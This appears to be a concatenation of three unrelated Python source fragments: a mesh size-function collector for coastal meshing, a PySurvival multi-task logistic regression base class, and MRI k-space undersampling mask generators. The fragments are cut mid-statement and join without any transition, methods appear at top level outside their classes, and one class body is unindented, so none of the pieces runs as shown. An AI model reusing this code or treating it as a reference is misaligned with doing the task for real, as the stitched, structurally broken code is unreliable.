    # Check nprocs: None or -1 both mean "use all available cores".
    nprocs = -1 if nprocs is None else nprocs
    nprocs = cpu_count() if nprocs == -1 else nprocs

    self._applied = False
    self._size_info = dict(hmin=hmin, hmax=hmax)
    self._nprocs = nprocs
    self._hfun_list = []
    self._method = method

    self._base_shape = base_shape
    self._base_shape_crs = CRS.from_user_input(base_shape_crs)
    self._base_as_hfun = base_as_hfun

    # NOTE: Base mesh has to have a crs otherwise HfunMesh throws
    # exception
    self._base_mesh = None
    if base_mesh:
        self._base_mesh = HfunMesh(base_mesh)
        if self._base_as_hfun:
            self._base_mesh.size_from_mesh()

    self._contour_info_coll = RefinementContourInfoCollector()
    self._contour_coll = RefinementContourCollector(
        self._contour_info_coll)
    self._const_val_contour_coll = ConstantValueContourInfoCollector()
    self._refine_patch_info_coll = RefinementPatchInfoCollector()
    self._flow_lim_coll = FlowLimiterInfoCollector()
    self._ch_info_coll = ChannelRefineInfoCollector()
    self._channels_coll = ChannelRefineCollector(
        self._ch_info_coll)
    self._constraint_info_coll = ConstraintInfoCollector()

    # Validates item types up-front (defined elsewhere in this class).
    self._type_chk(in_list)

    # TODO: Interpolate max size on base mesh basemesh?
    #
    # TODO: CRS considerations
    for in_item in in_list:
        # Add supports(ext) to each hfun type?
        if isinstance(in_item, BaseHfun):
            hfun = in_item

        elif isinstance(in_item, Raster):
            if self._base_shape:
                clip_shape = self._base_shape
                if not self._base_shape_crs.equals(in_item.crs):
                    transformer = Transformer.from_crs(
                        self._base_shape_crs, in_item.crs, always_xy=True)
                    clip_shape = ops.transform(
                        transformer.transform, clip_shape)
                try:
                    in_item.clip(clip_shape)
                except ValueError as err:
                    # This raster does not intersect shape
                    _logger.debug(err)
                    continue
            elif self._base_mesh:
                try:
                    in_item.clip(self._base_mesh.mesh.get_bbox(crs=in_item.crs))
                except ValueError as err:
                    # This raster does not intersect shape
                    _logger.debug(err)
                    continue
            hfun = HfunRaster(in_item, **self._size_info)

        elif isinstance(in_item, EuclideanMesh2D):
            hfun = HfunMesh(in_item)

        elif isinstance(in_item, str):
            if in_item.endswith('.tif'):
                raster = Raster(in_item)
                if self._base_shape:
                    clip_shape = self._base_shape
                    if not self._base_shape_crs.equals(raster.crs):
                        transformer = Transformer.from_crs(
                            self._base_shape_crs, raster.crs, always_xy=True)
                        clip_shape = ops.transform(
                            transformer.transform, clip_shape)
                    try:
                        # BUG FIX: clip the loaded Raster object; the
                        # original called .clip(...) on `in_item`, which
                        # is the path *string* in this branch.
                        raster.clip(clip_shape)
                    except ValueError as err:
                        # This raster does not intersect shape
                        _logger.debug(err)
                        continue
                elif self._base_mesh:
                    try:
                        raster.clip(self._base_mesh.mesh.get_bbox(crs=raster.crs))
                    except ValueError as err:
                        # This raster does not intersect shape
                        _logger.debug(err)
                        continue
                hfun = HfunRaster(raster, **self._size_info)
            elif in_item.endswith(
                    ('.14', '.grd', '.gr3', '.msh', '.2dm')):
                mesh = Mesh.open(in_item)
                hfun = HfunMesh(mesh)
            else:
                raise TypeError("Input file extension not supported!")
        self._hfun_list.append(hfun)
def msh_t(self) -> jigsaw_msh_t:
    """Build and return the composite size-function mesh.

    Raises ValueError if ``self._method`` is neither 'exact' nor 'fast'.
    """
    if self._method == 'exact':
        self._apply_features()
        # Intermediate per-source hfuns are written to a scratch dir and
        # combined; the dir is cleaned up automatically.
        with tempfile.TemporaryDirectory() as temp_dir:
            hfun_paths = self._write_hfun_to_disk(temp_dir)
            return self._get_hfun_composite(hfun_paths)
    if self._method == 'fast':
        with tempfile.TemporaryDirectory() as temp_dir:
            big_raster = self._create_big_raster(temp_dir)
            fast_hfun = self._apply_features_fast(big_raster)
            return self._get_hfun_composite_fast(fast_hfun)
    raise ValueError(f"Invalid method specified: {self._method}")
def add_topo_bound_constraint(
        self,
        value,
        upper_bound=np.inf,
        lower_bound=-np.inf,
        value_type: str = 'min',
        rate=0.01,
        source_index: Union[List[int], int, None] = None):
    """Register a constant-value topo constraint (applied lazily)."""
    # Mark dirty so features are (re)applied on the next build.
    self._applied = False
    constraint = TopoConstConstraint(
        value, upper_bound, lower_bound, value_type, rate)
    # Normalize a scalar source index to a one-element list.
    if source_index is not None and not isinstance(source_index, (tuple, list)):
        source_index = [source_index]
    self._constraint_info_coll.add(source_index, constraint)
def add_topo_func_constraint(
        self,
        func=lambda i: i / 2.0,
        upper_bound=np.inf,
        lower_bound=-np.inf,
        value_type: str = 'min',
        rate=0.01,
        source_index: Union[List[int], int, None] = None):
    """Register a function-of-topo constraint (applied lazily)."""
    # Mark dirty so features are (re)applied on the next build.
    self._applied = False
    constraint = TopoFuncConstraint(
        func, upper_bound, lower_bound, value_type, rate)
    # Normalize a scalar source index to a one-element list.
    if source_index is not None and not isinstance(source_index, (tuple, list)):
        source_index = [source_index]
    self._constraint_info_coll.add(source_index, constraint)
def add_contour(
        self,
        level: Union[List[float], float] = None,
        expansion_rate: float = 0.01,
        target_size: float = None,
        contour_defn: Contour = None,
        ):
    '''
    Contours are defined by contour defn or by raster sources only,
    but are applied on both raster and mesh hfun.

    Either pass `level` (scalar or list) to build Contour definitions,
    or pass an explicit `contour_defn` (in which case `level` is ignored
    with a warning).
    '''
    # Always lazy
    self._applied = False

    contour_defns = []
    if contour_defn is None:
        # Build one Contour per requested level.
        levels = list(level) if isinstance(level, (list, tuple)) else [level]
        contour_defns = [Contour(level=lvl) for lvl in levels]
    elif not isinstance(contour_defn, Contour):
        raise TypeError(
            f"Contour definition must be of type {Contour} not"
            f" {type(contour_defn)}!")
    else:
        if level is not None:
            msg = "Level is ignored since a contour definition is provided!"
            warnings.warn(msg)
            _logger.info(msg)
        # BUG FIX: the original dropped the definition entirely when a
        # level was also supplied (it warned "level is ignored" but then
        # registered nothing). Always register the provided definition.
        contour_defns.append(contour_defn)

    for ctr_dfn in contour_defns:
        self._contour_info_coll.add(
            ctr_dfn,
            expansion_rate=expansion_rate,
            target_size=target_size)
def add_channel(
        self,
        level: float = 0,
        width: float = 1000, # in meters
        target_size: float = 200,
        expansion_rate: float = None,
        tolerance: Union[None, float] = 50,
        channel_defn = None):
    """Register channel-based refinement (applied lazily)."""
    # Always lazy (the original set this flag twice; once suffices).
    self._applied = False

    # Even a tolerance of 1 for simplifying polygon for channel
    # calculations is much faster than no simplification. 50
    # is much faster than 1. The reason is in simplify we don't
    # preserve topology
    if channel_defn is None:
        channel_defn = Channel(
            level=level, width=width, tolerance=tolerance)
    elif not isinstance(channel_defn, Channel):
        raise TypeError(
            f"Channel definition must be of type {Channel} not"
            f" {type(channel_defn)}!")

    self._ch_info_coll.add(
        channel_defn,
        expansion_rate=expansion_rate,
        target_size=target_size)
def add_subtidal_flow_limiter(
        self,
        hmin=None,
        hmax=None,
        upper_bound=None,
        lower_bound=None,
        source_index: Union[List[int], int, None] = None):
    """Register a subtidal flow limiter spec (applied lazily).

    ``hmin``/``hmax`` clamp the computed sizes; ``upper_bound``/
    ``lower_bound`` presumably restrict the topo/bathy range the limiter
    acts on -- TODO confirm against the apply step. ``source_index`` of
    None targets all sources.
    """
    # Mark dirty so features are (re)applied on the next build.
    self._applied = False
    # Normalize a scalar source index to a one-element list.
    if source_index is not None and not isinstance(source_index, (tuple, list)):
        source_index = [source_index]
    # TODO: Checks on hmin/hmax, etc?
    self._flow_lim_coll.add(
        source_index,
        hmin=hmin,
        hmax=hmax,
        upper_bound=upper_bound,
        lower_bound=lower_bound)
def add_constant_value(
self, value,
lower_bound=None,
upper_bound=None,
source_index: Union[List[int], int, None] =None):
self._applied = False
contour_defn0 = None
contour_defn1 = None
if lower_bound is not None and not | |
# <gh_stars>0  (dataset artifact; commented out -- not valid Python)
from __future__ import absolute_import
import torch
import numpy as np
import copy
import multiprocessing
from pysurvival import HAS_GPU
from pysurvival import utils
from pysurvival.utils import neural_networks as nn
from pysurvival.utils import optimization as opt
from pysurvival.models import BaseModel
import sys
# %matplotlib inline
class BaseMultiTaskModel(BaseModel):
""" Base class for all Multi-Task estimators:
* Multi-Task Logistic Regression model (MTLR)
* Neural Multi-Task Logistic Regression model (N-MTLR)
BaseMultiTaskModel shouldn't be used as is.
The underlying model is written in PyTorch.
The original Multi-Task model, a.k.a the Multi-Task Logistic Regression
model (MTLR), was first introduced by <NAME> et al. in
*Learning Patient-Specific Cancer Survival Distributions as a Sequence of
Dependent Regressors*
The Neural Multi-Task Logistic Regression model (N-MTLR) was developed
by <NAME> in the paper *Deep Neural Networks for Survival
Analysis Based on a Multi-Task Framework*, allowing the use of
Neural Networks within the original design.
Parameters
----------
* `structure`: **list of dictionaries** --
Provides the structure of the MLP built within the N-MTLR.
ex: `structure = [ {'activation': 'ReLU', 'num_units': 128}, ]`.
Each dictionary corresponds to a fully connected hidden layer:
* `num_units` is the number of hidden units in this layer
* `activation` is the activation function that will be used.
The list of all available activation functions can be found :
* Atan
* BentIdentity
* BipolarSigmoid
* CosReLU
* ELU
* Gaussian
* Hardtanh
* Identity
* InverseSqrt
* LeakyReLU
* LeCunTanh
* LogLog
* LogSigmoid
* ReLU
* SELU
* Sigmoid
* Sinc
* SinReLU
* Softmax
* Softplus
* Softsign
* Swish
* Tanh
In case there are more than one dictionary,
each hidden layer will be applied in the resulting MLP,
using the order it is provided in the structure:
ex: structure = [ {'activation': 'relu', 'num_units': 128},
{'activation': 'tanh', 'num_units': 128}, ]
* `bins`: **int** *(default=100)* --
Number of subdivisions of the time axis
* `auto_scaler`: **boolean** *(default=True)* --
Determines whether a sklearn scaler should be automatically applied
"""
def __init__(self, structure, bins=100, auto_scaler=True):
    """Store the MTLR hyper-parameters and initialize BaseModel state."""
    # Saving the attributes
    self.loss_values = []       # loss history, appended to during training
    self.structure = structure  # MLP structure used by the N-MTLR variant
    self.bins = bins            # number of subdivisions of the time axis
    # Initializing the elements from BaseModel (explicit-args super kept
    # for compatibility with the file's `absolute_import` py2/3 style).
    super(BaseMultiTaskModel, self).__init__(auto_scaler)
def get_times(self, T, is_min_time_zero=True, extra_pct_time=0.1):
    """ Building the time axis (self.times) as well as the time intervals
    ( all the [ t(k-1), t(k) ) in the time axis.

    Sets self.times, self.time_buckets (via get_time_buckets from the
    base class) and self.num_times.

    Raises ValueError if extra_pct_time is outside [0, 1]. (The original
    raised a bare Exception; ValueError is a subclass, so callers
    catching Exception still work.)
    """
    # Validate before touching any state.
    if not 0. <= extra_pct_time <= 1.:
        raise ValueError("extra_pct_time has to be between [0, 1].")

    # Setting the min_time and max_time
    max_time = max(T)
    min_time = 0. if is_min_time_zero else min(T)

    # Evenly spaced grid of `bins` time points, padded by extra_pct_time.
    self.times = np.linspace(
        min_time, max_time * (1. + extra_pct_time), self.bins)
    self.get_time_buckets()
    self.num_times = len(self.time_buckets)
def compute_XY(self, X, T, E, is_min_time_zero, extra_pct_time):
    """ Given the survival_times, events and time_points vectors,
    it returns a ndarray of the encodings for all units
    such that:
        Y = [[0, 0, 1, 0, 0], # unit experienced an event at t = 3
             [0, 1, 0, 0, 0], # unit experienced an event at t = 2
             [0, 1, 1, 1, 1],] # unit was censored at t = 2

    Splits the samples into censored (E == 0) and uncensored (E == 1)
    groups and returns (X_cens, X_uncens, Y_cens, Y_uncens) as torch
    FloatTensors, moved to GPU when CUDA is available. X may be a single
    array or a list of arrays (multi-input networks); in the latter case
    X_cens/X_uncens are lists of tensors.
    """
    # building times axis (sets self.times / self.time_buckets / num_times)
    self.get_times(T, is_min_time_zero, extra_pct_time)
    n_units = T.shape[0]  # NOTE(review): unused; kept as in original

    # Initializing the output variable
    Y_cens, Y_uncens = [], []
    X_cens, X_uncens = [], []
    if isinstance(X, list):
        # One sub-list per network input.
        for input_ in X:
            X_cens.append([])
            X_uncens.append([])

    # Building the output variable
    for i, (t, e) in enumerate(zip(T, E)):
        # One slot per time bucket plus a trailing slot (times beyond axis).
        y = np.zeros(self.num_times + 1)
        # Bucket whose lower edge is closest to t.
        min_abs_value = [abs(a_j_1 - t) for (a_j_1, a_j) in self.time_buckets]
        index = np.argmin(min_abs_value)

        if e == 1:
            # Event: a single 1 at the event bucket.
            y[index] = 1.
            if isinstance(X, list):
                for j, input_ in enumerate(X):
                    X_uncens[j].append(input_[i, :].tolist())
            else:
                X_uncens.append(X[i, :].tolist())
            Y_uncens.append(y.tolist())
        else:
            # Censored: 1s from the censoring bucket onward.
            y[(index):] = 1.
            if isinstance(X, list):
                for j, input_ in enumerate(X):
                    X_cens[j].append(input_[i, :].tolist())
            else:
                X_cens.append(X[i, :].tolist())
            Y_cens.append(y.tolist())

    # Transform into torch.Tensor (and move to GPU when available)
    if isinstance(X, list):
        for j, input_ in enumerate(X_cens):
            X_cens[j] = torch.FloatTensor(input_)
            if torch.cuda.is_available():
                X_cens[j] = X_cens[j].cuda()
        for j, input_ in enumerate(X_uncens):
            X_uncens[j] = torch.FloatTensor(input_)
            if torch.cuda.is_available():
                X_uncens[j] = X_uncens[j].cuda()
    else:
        X_cens = torch.FloatTensor(X_cens)
        X_uncens = torch.FloatTensor(X_uncens)
        if torch.cuda.is_available():
            X_cens = X_cens.cuda()
            X_uncens = X_uncens.cuda()
    Y_cens = torch.FloatTensor(Y_cens)
    Y_uncens = torch.FloatTensor(Y_uncens)
    if torch.cuda.is_available():
        Y_cens = Y_cens.cuda()
        Y_uncens = Y_uncens.cuda()
    return X_cens, X_uncens, Y_cens, Y_uncens
def loss_function(self, model, X_cens, X_uncens, Y_cens, Y_uncens,
                  Triangle, l2_reg, l2_smooth, min_clamp_value=1e-8,
                  max_clamp_value=torch.finfo(torch.float32).max-1):
    """ Computes the loss function of the any MTLR model.
    All the operations have been vectorized to ensure optimal speed.

    Returns the (regularized) negative log-likelihood as a scalar tensor.
    """
    score_cens = model(X_cens)
    score_uncens = model(X_uncens)

    # phi = clamp(exp(clamp(score @ Triangle))); 88.5 ~= log(float32 max)
    # keeps exp() finite.
    # NOTE(review): the inner clamp min=1e-8 also forces the products to be
    # non-negative; kept verbatim to preserve the original numerics.
    temp_uncens = torch.clamp(
        torch.mm(score_uncens, Triangle), min=1e-8, max=88.5)
    phi_uncens = torch.clamp(torch.exp(temp_uncens), max=max_clamp_value)
    temp_cens = torch.clamp(
        torch.mm(score_cens, Triangle), min=1e-8, max=88.5)
    phi_cens = torch.clamp(torch.exp(temp_cens), max=max_clamp_value)

    # Likelihood Calculations -- numerators
    reduc_phi_uncens = torch.sum(phi_uncens * Y_uncens, dim=1)
    reduc_phi_cens = torch.sum(phi_cens * Y_cens, dim=1)

    # Likelihood Calculations -- Normalization. The original recomputed
    # mm/clamp/exp here with identical inputs; reusing phi_* yields the
    # same values with two fewer matmuls.
    reduc_z_uncens = torch.sum(phi_uncens, dim=1)
    reduc_z_cens = torch.sum(phi_cens, dim=1)

    # Guard the log() arguments.
    reduc_phi_uncens = torch.clamp(reduc_phi_uncens, min=min_clamp_value, max=max_clamp_value)
    reduc_phi_cens = torch.clamp(reduc_phi_cens, min=min_clamp_value, max=max_clamp_value)
    reduc_z_uncens = torch.clamp(reduc_z_uncens, min=min_clamp_value, max=max_clamp_value)
    reduc_z_cens = torch.clamp(reduc_z_cens, min=min_clamp_value, max=max_clamp_value)

    # MTLR cost function (negative log-likelihood)
    loss = - (
        torch.sum(torch.log(reduc_phi_uncens))
        + torch.sum(torch.log(reduc_phi_cens))
        - torch.sum(torch.log(reduc_z_uncens))
        - torch.sum(torch.log(reduc_z_cens))
    )

    # Adding the regularized loss: L2 on all weights; smoothness penalty
    # (norm_diff, provided by the surrounding module) on the last layer.
    nb_set_parameters = len(list(model.parameters()))
    for i, w in enumerate(model.parameters()):
        loss += l2_reg * torch.sum(w * w) / 2.
        if i >= nb_set_parameters - 2:
            loss += l2_smooth * norm_diff(w)
    return loss
def fit(self, X, T, E, init_method='glorot_uniform', optimizer='adam',
lr=1e-4, num_epochs=1000, dropout=0.2, l2_reg=1e-2,
l2_smooth=1e-2, batch_normalization=False, bn_and_dropout=False,
verbose=True, extra_pct_time=0.1, is_min_time_zero=True, max_norm=1.0,
min_clamp_value=1e-8, max_clamp_value=torch.finfo(torch.float32).max -1):
""" Fit the estimator based on the given parameters.
Parameters:
-----------
* `X` : **array-like**, *shape=(n_samples, n_features)* --
The input samples.
* `T` : **array-like** --
The target values describing when the event of interest or censoring
occurred.
* `E` : **array-like** --
The values that indicate if the event of interest occurred i.e.:
E[i]=1 corresponds to an event, and E[i] = 0 means censoring,
for all i.
* `init_method` : **str** *(default = 'glorot_uniform')* --
Initialization method to use. Here are the possible options:
* `glorot_uniform`: Glorot/Xavier uniform initializer
* `he_uniform`: He uniform variance scaling initializer
* `uniform`: Initializing tensors with uniform (-1, 1) distribution
* `glorot_normal`: Glorot normal initializer,
* `he_normal`: He normal initializer.
* `normal`: Initializing tensors with standard normal distribution
* `ones`: Initializing tensors to 1
* `zeros`: Initializing tensors to 0
* `orthogonal`: Initializing tensors with a orthogonal matrix,
* `optimizer`: **str** *(default = 'adam')* --
iterative method for optimizing a differentiable objective function.
Here are the possible options:
- `adadelta`
- `adagrad`
- `adam`
- `adamax`
- `rmsprop`
- `sparseadam`
- `sgd`
* `lr`: **float** *(default=1e-4)* --
learning rate used in the optimization
* `num_epochs`: **int** *(default=1000)* --
The number of iterations in the optimization
* `dropout`: **float** *(default=0.5)* --
Randomly sets a fraction rate of input units to 0
at each update during training time, which helps prevent overfitting.
* `l2_reg`: **float** *(default=1e-4)* --
L2 regularization parameter for the model coefficients
* `l2_smooth`: **float** *(default=1e-4)* --
Second L2 regularizer that ensures the parameters vary smoothly
across consecutive time points.
* `batch_normalization`: **bool** *(default=True)* --
Applying Batch Normalization or not
* `bn_and_dropout`: **bool** *(default=False)* --
Applying Batch Normalization and Dropout at the same time
* `display_loss`: **bool** *(default=True)* --
Whether or not showing the loss function values at each update
* `verbose`: **bool** *(default=True)* --
Whether or not producing detailed logging about the modeling
* `extra_pct_time`: **float** *(default=0.1)* --
Providing an extra fraction of time in the time axis
* `is_min_time_zero`: **bool** *(default=True)* --
Whether the the time axis starts at 0
* `max_norm`: **float** *(default=1.0)* --
Max l2 norm for gradient clipping
**Returns:**
* self : object
Example:
--------
#### 1 - Importing packages
import | |
lines are spaced exactly evenly, as is done in standard GRAPPA-style
acquisitions. This means that with a densely-sampled center,
``acceleration`` will be greater than the true acceleration rate.
"""
def calculate_acceleration_mask(
    self,
    num_cols: int,
    acceleration: int,
    offset: Optional[int],
    num_low_frequencies: int,
) -> np.ndarray:
    """
    Produce mask for non-central acceleration lines.

    Args:
        num_cols: Number of columns of k-space (2D subsampling).
        acceleration: Desired acceleration rate.
        offset: Offset from 0 to begin masking. If no offset is specified,
            then one is selected randomly.
        num_low_frequencies: Not used.

    Returns:
        A mask for the high spatial frequencies of k-space.
    """
    start = offset
    if start is None:
        start = self.rng.randint(0, high=round(acceleration))
    # Select every `acceleration`-th column beginning at `start`.
    selected = np.arange(start, num_cols, acceleration)
    mask = np.zeros(num_cols, dtype=np.float32)
    mask[selected] = 1
    return mask
class EquispacedMaskFractionFunc(MaskFunc):
    """
    Equispaced mask with exact acceleration matching.

    The mask selects a subset of columns from the input k-space data. If the
    k-space data has N columns, the mask picks out:
        1. N_low_freqs = (N * center_fraction) columns in the center
           corresponding to low frequencies.
        2. The other columns are selected with equal spacing at a proportion
           that reaches the desired acceleration rate taking into
           consideration the number of low frequencies. This ensures that
           the expected number of columns selected is equal to
           (N / acceleration).

    It is possible to use multiple center_fractions and accelerations, in
    which case one possible (center_fraction, acceleration) pair is chosen
    uniformly at random each time the object is called.

    Note that this function may not give equispaced samples (documented in
    https://github.com/facebookresearch/fastMRI/issues/54), which will
    require modifications to standard GRAPPA approaches. Nonetheless, this
    aspect of the function has been preserved to match the public multicoil
    data.
    """

    def calculate_acceleration_mask(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
    ) -> np.ndarray:
        """
        Produce mask for non-central acceleration lines.

        Args:
            num_cols: Number of columns of k-space (2D subsampling).
            acceleration: Desired acceleration rate.
            offset: Offset from 0 to begin masking. If no offset is
                specified, then one is selected randomly.
            num_low_frequencies: Number of low frequencies. Used to adjust
                the mask to exactly match the target acceleration.

        Returns:
            A mask for the high spatial frequencies of k-space.
        """
        # Correct the stride for the densely sampled center so the overall
        # expected sampling fraction is exactly 1 / acceleration.
        adjusted_accel = (acceleration * (num_low_frequencies - num_cols)) / (
            num_low_frequencies * acceleration - num_cols
        )
        start = offset
        if start is None:
            start = self.rng.randint(0, high=round(adjusted_accel))
        sample_positions = np.around(
            np.arange(start, num_cols - 1, adjusted_accel)
        ).astype(np.uint)
        mask = np.zeros(num_cols)
        mask[sample_positions] = 1.0
        return mask
class EquispacedMaskFractionFunc3D(MaskFunc3D):
    """3D mask cycling through four interleaved regular patterns.

    NOTE(review): the sampling stride is hard-coded to 3 in both in-plane
    directions and the ``acceleration``/``offset``/``num_low_frequencies``
    arguments are ignored -- confirm this is intentional.
    """

    def __init__(self, center_fractions, accelerations, allow_any_combination=False, seed=None):
        super().__init__(center_fractions, accelerations, allow_any_combination, seed)
        # self.eliptical_mask = np.load(os.path.join(os.path.dirname(__file__), "kspace_eliptical_mask.npy")).astype(float)
        # Rolling counter (0..3) selecting which interleaved pattern to
        # emit on the next call; state persists across calls.
        self.offset_mask = 0

    def calculate_acceleration_mask_3D(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        seed
    ) -> np.ndarray:
        """
        Produce a 2D mask over the two phase-encode dimensions
        (shape[-3], shape[-2]); a different interleave is returned on
        each call. Arguments other than ``shape`` are unused.
        """
        # Wrap the counter after the 4th pattern (valid values are 0..3).
        if self.offset_mask > 3:
            self.offset_mask = 0
        mask = np.zeros((shape[-3], shape[-2]))
        # Decompose the counter into row/column start offsets:
        # (0,0), (1,0), (0,1), (1,1) over successive calls.
        mask_offset = self.offset_mask % 2
        phase_offset = self.offset_mask // 2
        # Every 3rd line in both directions, shifted by the offsets.
        mask[mask_offset::3, phase_offset::3] = 1.0
        self.offset_mask += 1
        return mask
class EquispacedMaskFractionFunc3D(MaskFunc3D):
    """3D mask cycling through four interleaved regular patterns.

    NOTE(review): this class is a byte-for-byte duplicate of the
    ``EquispacedMaskFractionFunc3D`` defined immediately above; this later
    definition rebinds the name. Likely a copy-paste leftover -- consider
    removing one of the two.
    """

    def __init__(self, center_fractions, accelerations, allow_any_combination=False, seed=None):
        super().__init__(center_fractions, accelerations, allow_any_combination, seed)
        # self.eliptical_mask = np.load(os.path.join(os.path.dirname(__file__), "kspace_eliptical_mask.npy")).astype(float)
        # Rolling counter (0..3) selecting the next interleaved pattern.
        self.offset_mask = 0

    def calculate_acceleration_mask_3D(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        seed
    ) -> np.ndarray:
        """
        Produce a 2D mask over the two phase-encode dimensions
        (shape[-3], shape[-2]); a different interleave is returned on
        each call. Arguments other than ``shape`` are unused.
        """
        # Wrap the counter after the 4th pattern (valid values are 0..3).
        if self.offset_mask > 3:
            self.offset_mask = 0
        mask = np.zeros((shape[-3], shape[-2]))
        # (0,0), (1,0), (0,1), (1,1) start offsets over successive calls.
        mask_offset = self.offset_mask % 2
        phase_offset = self.offset_mask // 2
        mask[mask_offset::3, phase_offset::3] = 1.0
        self.offset_mask += 1
        return mask
class EquispacedMaskFractionFuncCenterDense3D(MaskFunc3D):
    """Static 3D mask: a 4x4 undersampling grid plus a denser sub-block."""

    def calculate_acceleration_mask_3D(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        seed
    ) -> np.ndarray:
        """Return a fixed 2D mask over (shape[-3], shape[-2]).

        All arguments besides ``shape`` are unused; the same pattern is
        produced on every call.
        """
        mask = np.zeros((shape[-3], shape[-2]))
        # Regular grid: every 4th line in both directions, anchored at 0.
        mask[0::4, 0::4] = 1.0
        # Denser (stride-2) sampling over a fixed rectangular region.
        mask[5:15:2, 32:-32:2] = 1
        return mask
class VariableDensitiyMask3D(MaskFunc3D):
    """Gaussian variable-density 3D mask with a fully sampled center block.

    NOTE(review): the class name carries a typo ("Densitiy"); renaming
    would break callers, so it is kept.
    """

    def __init__(self, accelerations, allow_any_combination=False, seed=None):
        # center_fractions is unused by this mask type, hence the dummy [0].
        super().__init__([0], accelerations, allow_any_combination, seed)
        self.rng_new = np.random.default_rng(seed)
        # Initial sample-count guess; adapted in draw_samples until the
        # achieved acceleration matches the target.
        self.num_samples = 300

    def draw_samples(self, shape, acceleration):
        """Search for a mask whose achieved acceleration is within `tol`.

        Draws ``num_samples`` points from an anisotropic Gaussian centered
        on k-space center, adds a dense center block, and adjusts
        ``num_samples`` by +/-50 until the achieved rate R is close to the
        target. NOTE(review): there is no iteration cap -- the +/-50
        adjustment could oscillate around the target without ever landing
        within `tol`; confirm convergence for the shapes used.
        """
        tol = 0.1
        while True:
            # Anisotropic Gaussian: much larger spread along axis 2.
            s = self.rng_new.multivariate_normal([shape[1] // 2, shape[2] // 2], [[15, 0], [0, 500]], self.num_samples)
            # Clamp samples into the grid before integer conversion.
            s[:, 0] = np.clip(s[:, 0], 0, shape[1] - 1)
            s[:, 1] = np.clip(s[:, 1], 0, shape[2] - 1)
            s = s.astype(int)
            mask = np.zeros(shape[1:-1], dtype=bool)
            mask[s[:, 0], s[:, 1]] = True
            # Dense center sampling
            mask[int(mask.shape[0] * 3 / 8):int(mask.shape[0] * 5 / 8),
                 int(mask.shape[1] * 9 / 20):int(mask.shape[1] * 11 / 20)] = True
            # Achieved acceleration: reciprocal of the sampled fraction.
            R = 1 / (np.sum(mask) / (mask.shape[0] * mask.shape[1]))
            if R > acceleration:
                self.num_samples += 50
            elif R < acceleration:
                self.num_samples -= 50
            if np.abs(acceleration - R) < tol:
                return mask

    def calculate_acceleration_mask_3D(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        seed,
    ) -> np.ndarray:
        # Re-seed per call so the drawn mask is deterministic for a seed.
        self.rng_new = np.random.default_rng(seed)
        mask = self.draw_samples(shape, acceleration)
        # Leading singleton axis to match the expected mask rank.
        return mask[None]
class PoissonDensitiyMask3D(MaskFunc3D):
    """Poisson-disc 3D mask, optionally served from a precomputed cache.

    NOTE(review): the cache path below is a hard-coded absolute Windows
    path to a user directory -- this breaks on any other machine; it
    should come from configuration or an environment variable.
    """

    def __init__(self, accelerations, allow_any_combination=False, seed=None, cached=True):
        # center_fractions is unused by this mask type, hence the dummy [0].
        super().__init__([0], accelerations, allow_any_combination, seed)
        self.rng_new = np.random.default_rng(seed)
        self.poisson_radius = 0.0125  # NOTE(review): unused here -- confirm
        self.rng_new = np.random.default_rng(seed)
        self.cached = cached
        if cached:
            # HACK: machine-specific absolute path (see class note).
            self.poisson_masks = np.load(r"C:\Users\follels\Documents\fastMRI\cache\poisson_disc_masks\masks.npy")

    def poisson_disc_calculation(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        seed,
    ) -> np.ndarray:
        """Build a Poisson-disc mask: a denser inner region embedded in a
        sparser outer one. PoissonSampler is provided by the surrounding
        module; its positional arguments are presumably (h, w, radius,
        step?, seed, ?, density) -- TODO confirm against its definition.
        """
        # Round to closest even number
        self.rng_new = np.random.default_rng(seed)
        inner_shape = ((shape[1] // 2) & ~1, (shape[2] // 2) & ~1)
        accu_inner = np.zeros((inner_shape[0], inner_shape[1]), dtype=np.int32)
        PS = PoissonSampler(inner_shape[0], inner_shape[1], 5, 2, 42, 0, 0.7)
        mask_inner = PS.generate(self.rng_new, accu_inner)
        outer_shape = (shape[1] & ~1, shape[2] & ~1)
        accu_outer = np.zeros((outer_shape[0], outer_shape[1]), dtype=np.int32)
        PS = PoissonSampler(outer_shape[0], outer_shape[1], 8, 4, 42, 0, 0.7)
        mask_combined = PS.generate(self.rng_new, accu_outer)
        # Paste the denser inner mask into the center of the outer mask.
        mask_combined[mask_combined.shape[0] // 2 - inner_shape[0] // 2:mask_combined.shape[0] // 2 + inner_shape[0] // 2,
                      mask_combined.shape[1] // 2 - inner_shape[1] // 2:mask_combined.shape[1] // 2 + inner_shape[1] // 2] = mask_inner
        # For uneven shapes
        final_mask = np.zeros(shape[1:-1])
        final_mask[0:mask_combined.shape[0], 0:mask_combined.shape[1]] = mask_combined
        return final_mask

    def calculate_acceleration_mask_3D(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        seed,
    ) -> np.ndarray:
        if self.cached:
            # Pick one of the 100 precomputed masks, deterministic per seed.
            self.rng_new = np.random.default_rng(seed)
            case_idx = self.rng_new.integers(0, 100)
            mask = self.poisson_masks[case_idx]
        else:
            mask = self.poisson_disc_calculation(num_cols, acceleration, offset, num_low_frequencies, shape, seed)
        return mask
class CartesianOffsetMask3D(MaskFunc3D):
    """Stack of interleaved Cartesian masks, one per temporal offset.

    NOTE(review): ``calculate_acceleration_mask_3D`` here takes an extra
    ``num_offsets`` parameter that the sibling MaskFunc3D subclasses do
    not -- confirm the caller passes it.
    """

    def __init__(self, accelerations, allow_any_combination=False, seed=None):
        # center_fractions is unused by this mask type, hence the dummy [0].
        super().__init__([0], accelerations, allow_any_combination, seed)
        self.rng_new = np.random.default_rng(seed)

    def calculate_acceleration_mask_3D(
        self,
        num_cols: int,
        acceleration: int,
        offset: Optional[int],
        num_low_frequencies: int,
        shape,
        num_offsets,
        seed,
    ) -> np.ndarray:
        """Return ``num_offsets`` masks, each sampling every
        ``num_offsets``-th point with a different phase, plus a fully
        sampled central block shared by all of them.

        NOTE(review): the loop variable below shadows the ``offset``
        parameter, and the tiling assumes prod(shape[1:-1]) is divisible
